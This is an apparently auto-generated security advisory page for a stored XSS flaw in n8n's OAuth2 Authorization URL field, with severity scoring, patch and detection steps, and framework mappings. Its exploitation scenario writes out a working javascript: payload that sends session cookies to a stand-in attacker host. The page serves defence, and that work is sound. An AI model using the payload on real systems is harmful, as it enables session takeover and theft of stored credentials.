GHSA-364x-8g5j-x2pr — MEDIUM (CVSS 5.4)

Q: Is GHSA-364x-8g5j-x2pr actively exploited?

No confirmed active exploitation of GHSA-364x-8g5j-x2pr has been reported, but organizations should still patch proactively.

Q: How to fix GHSA-364x-8g5j-x2pr?

1. PATCH: Upgrade to n8n 2.8.0 or 2.6.4 immediately—these versions sanitize the Authorization URL field. 2. AUDIT: Query existing OAuth2 credentials for entries with 'javascript:' or 'data:' scheme URLs; revoke any suspicious credentials. 3. RESTRICT: Tighten credential creation and sharing permissions to the minimum necessary set of users until patched. 4. DETECT: Add WAF rules or log-based alerts for 'javascript:' or 'vbscript:' patterns in n8n API requests to credential endpoints. 5. SCOPE: Inventory all API keys and tokens stored in n8n; rotate any that may have been exposed if exploitation cannot be ruled out.

Q: What systems are affected by GHSA-364x-8g5j-x2pr?

This vulnerability affects the following AI/ML architecture patterns: agent frameworks, AI automation pipelines, workflow orchestration, LLM API integration layers.

Q: What is the CVSS score for GHSA-364x-8g5j-x2pr?

GHSA-364x-8g5j-x2pr has a CVSS v3.1 base score of 5.4 (MEDIUM).

CISO Take

Any organization running n8n as an AI agent orchestration layer should treat this as urgent: a malicious insider or compromised account with credential-creation rights can plant a stored XSS payload that fires when a target admin interacts with OAuth, potentially handing over full session control and all connected API keys (OpenAI, Slack, databases). Upgrade to 2.8.0+ or 2.6.4+ immediately; until then, restrict credential creation to a minimal list of fully trusted users and audit existing OAuth2 credentials for javascript: scheme URLs.

What is the risk?

Nominal CVSS 5.4 (medium) understates real-world risk in AI-heavy environments. n8n instances typically hold credentials for dozens of upstream services—LLM APIs, vector databases, data warehouses—making session takeover disproportionately damaging. Exploitability is trivial once the attacker has any credential-creation permission; no AI/ML knowledge required. Insider threat and credential-sharing abuse patterns are realistic vectors. Organizations with large n8n deployments shared across teams face the highest exposure.

What systems are affected?

Package	Ecosystem	Vulnerable Range	Patched
n8n	npm	>= 2.7.0, < 2.8.0	`2.8.0`
187.3K OpenSSF 6.1 16 dependents Pushed 5d ago 43% patched ~3d to patch Full package profile →

Do you use n8n? You're affected.

Severity & Risk

CVSS 3.1

5.4 / 10

EPSS

N/A

Exploitation Status

No known exploitation

Sophistication

Trivial

Attack Surface

AV Network

AC Low

PR Low

UI Required

S Changed

C Low

I Low

A None

What should I do?

5 steps

PATCH

Upgrade to n8n 2.8.0 or 2.6.4 immediately—these versions sanitize the Authorization URL field.
AUDIT

Query existing OAuth2 credentials for entries with 'javascript:' or 'data:' scheme URLs; revoke any suspicious credentials.
RESTRICT

Tighten credential creation and sharing permissions to the minimum necessary set of users until patched.
DETECT

Add WAF rules or log-based alerts for 'javascript:' or 'vbscript:' patterns in n8n API requests to credential endpoints.
SCOPE

Inventory all API keys and tokens stored in n8n; rotate any that may have been exposed if exploitation cannot be ruled out.

Classification

Code Execution Data Extraction Social Engineering Agent Framework Plugin AML.T0011.003 - Malicious Link AML.T0012 - Valid Accounts AML.T0049 - Exploit Public-Facing Application AML.T0053 - AI Agent Tool Invocation AML.T0055 - Unsecured Credentials AML.T0081 - Modify AI Agent Configuration AML.T0083 - Credentials from AI Agent Configuration

Compliance Impact

This CVE is relevant to:

EU AI Act

Article 15 - Accuracy, Robustness and Cybersecurity

ISO 42001

6.1.2 - AI Risk Assessment 8.4 - AI System Operation A.10.2 - AI system operational controls — input/output management A.6.2 - Roles and responsibilities for AI risk

NIST AI RMF

GOVERN 6.1 - Policies for vulnerability and incident response MANAGE 2.4 - Residual risks are managed MANAGE-2.2 - Mechanisms to respond to harmful AI incidents

OWASP LLM Top 10

LLM05:2025 - Improper Output Handling LLM07:2025 - System Prompt Leakage LLM08:2025 - Excessive Agency

Frequently Asked Questions

What is GHSA-364x-8g5j-x2pr?

Any organization running n8n as an AI agent orchestration layer should treat this as urgent: a malicious insider or compromised account with credential-creation rights can plant a stored XSS payload that fires when a target admin interacts with OAuth, potentially handing over full session control and all connected API keys (OpenAI, Slack, databases). Upgrade to 2.8.0+ or 2.6.4+ immediately; until then, restrict credential creation to a minimal list of fully trusted users and audit existing OAuth2 credentials for javascript: scheme URLs.

Is GHSA-364x-8g5j-x2pr actively exploited?

No confirmed active exploitation of GHSA-364x-8g5j-x2pr has been reported, but organizations should still patch proactively.

How to fix GHSA-364x-8g5j-x2pr?

1. PATCH: Upgrade to n8n 2.8.0 or 2.6.4 immediately—these versions sanitize the Authorization URL field. 2. AUDIT: Query existing OAuth2 credentials for entries with 'javascript:' or 'data:' scheme URLs; revoke any suspicious credentials. 3. RESTRICT: Tighten credential creation and sharing permissions to the minimum necessary set of users until patched. 4. DETECT: Add WAF rules or log-based alerts for 'javascript:' or 'vbscript:' patterns in n8n API requests to credential endpoints. 5. SCOPE: Inventory all API keys and tokens stored in n8n; rotate any that may have been exposed if exploitation cannot be ruled out.

What systems are affected by GHSA-364x-8g5j-x2pr?

This vulnerability affects the following AI/ML architecture patterns: agent frameworks, AI automation pipelines, workflow orchestration, LLM API integration layers.

What is the CVSS score for GHSA-364x-8g5j-x2pr?

GHSA-364x-8g5j-x2pr has a CVSS v3.1 base score of 5.4 (MEDIUM).

Technical Details

NVD Description

## Impact An authenticated user with permission to create and share credentials could craft a malicious OAuth2 credential containing a JavaScript URL in the Authorization URL field. If a victim opened the credential and interacted with the OAuth authorization button, the injected script would execute in their browser session. ## Patches The issue has been fixed in n8n versions 2.8.0 and 2.6.4. Users should upgrade to one of these versions or later to remediate the vulnerability. ## Workarounds If upgrading is not immediately possible, administrators should consider the following temporary mitigations: - Limit credential creation and sharing permissions to fully trusted users only. - Restrict access to the n8n instance to trusted users only. These workarounds do not fully remediate the risk and should only be used as short-term mitigation measures.

Exploitation Scenario

A disgruntled team member or attacker who has compromised a low-privilege n8n account (e.g., a developer account) creates an OAuth2 credential named something innocuous like 'Slack Integration (Prod)'. In the Authorization URL field they inject: javascript:fetch('https://c2.attacker.io/x?s='+document.cookie). They share this credential with a target admin. The admin, seeing a familiar-looking credential, opens it and clicks the 'Connect' or 'Authorize' button to verify or update it. The injected script executes in the admin's browser session, exfiltrating session cookies to the attacker's C2. The attacker replays the session token, gaining full admin access to n8n and all stored credentials—including OpenAI API keys, database connection strings, and downstream service tokens.